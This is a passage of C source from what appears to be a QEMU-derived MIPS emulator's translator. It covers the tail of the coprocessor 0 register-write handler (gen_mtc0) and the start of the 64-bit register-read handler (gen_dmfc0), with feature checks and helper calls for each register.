CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: gen_helper_mtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_mtc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MemoryMapID)); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageGrain"; ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); gen_helper_mtc0_pwfield(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); gen_helper_mtc0_pwsize(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); 
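/* SRSConf1..SRSConf4 all follow the same pattern: an ISA R2 check followed by a helper that masks the stored value to the core's writable bits. */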
gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_helper_mtc0_pwctl(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: /* ignored */ //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: /* ignored */ //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: /* ignored */ //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: /* ignored */ //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_helper_mtc0_saari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mtc0_saar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: save_cpu_state(ctx, 1); gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); /* DISAS_STOP isn't good enough here, hflags may have changed. 
*/ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: save_cpu_state(ctx, 1); gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); /* * Stop translation as we may have triggered an interrupt. * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: /* ignored */ //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG1: /* ignored, read only */ //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config2"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG3: gen_helper_mtc0_config3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config3"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG4: gen_helper_mtc0_config4(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config4"; ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG5: gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config5"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; /* 6,7 are implementation dependent */ case CP0_REG16__CONFIG6: /* ignored */ //register_name = "Config6"; break; case CP0_REG16__CONFIG7: /* ignored */ //register_name = "Config7"; break; default: //register_name = "Invalid config selector"; goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAAR"; 
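/* MAAR and MAARI accesses are gated on ctx->mrp, i.e. the MAAR registers advertised via Config5.MRP. */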
break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "XContext"; break; #endif default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: /* ignored */ //register_name = "Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ /* DISAS_STOP isn't good enough here, hflags may have changed. 
*/ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "TraceControl"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol2(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "TraceControl2"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_mtc0_usertracedata1(tcg_ctx, tcg_ctx->cpu_env, arg);*/ //register_name = "UserTraceData"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_mtc0_traceibpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_mtc0_tracedbpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_mtc0_performance1(tcg_ctx, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_mtc0_performance2(tcg_ctx, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_mtc0_performance3(tcg_ctx, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_mtc0_performance4(tcg_ctx, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_mtc0_performance5(tcg_ctx, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_mtc0_performance6(tcg_ctx, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_mtc0_performance7(tcg_ctx, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_helper_mtc0_errctl(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { case CP0_REG27__CACHERR: /* ignored */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: gen_helper_mtc0_taglo(tcg_ctx, 
tcg_ctx->cpu_env, arg); //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataHi"; break; default: //register_name = "invalid sel"; goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } /* For simplicity assume that all writes can cause interrupts. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { /* * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. 
*/ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "mtc0 %s (reg %d sel %d)\n", //register_name, reg, sel); return; } #if defined(TARGET_MIPS64) static void gen_dmfc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS64); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Index)); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPControl)); //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_YQMask)); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); 
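/* The dmfc0_* helper variants return the full 64-bit register contents; the mfc0_* forms used by gen_mfc0() return a sign-extended 32-bit view instead. */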
//register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_GlobalNumber)); //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_dmfc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_helper_mtc0_memorymapid(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); //register_name = "PageGrain"; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl0)); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl1)); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl2)); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWField)); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWSize)); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Wired)); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); 
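/* SRSConf0..SRSConf4 describe the shadow register sets introduced in Release 2, hence the ISA_MIPS32R2 check before each load. */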
gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWCtl)); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: CP0_CHECK(ctx->bp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrX)); tcg_gen_andi_tl(tcg_ctx, arg, arg, ~0xffff); //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: /* Mark as an IO operation because we read the time. */ if 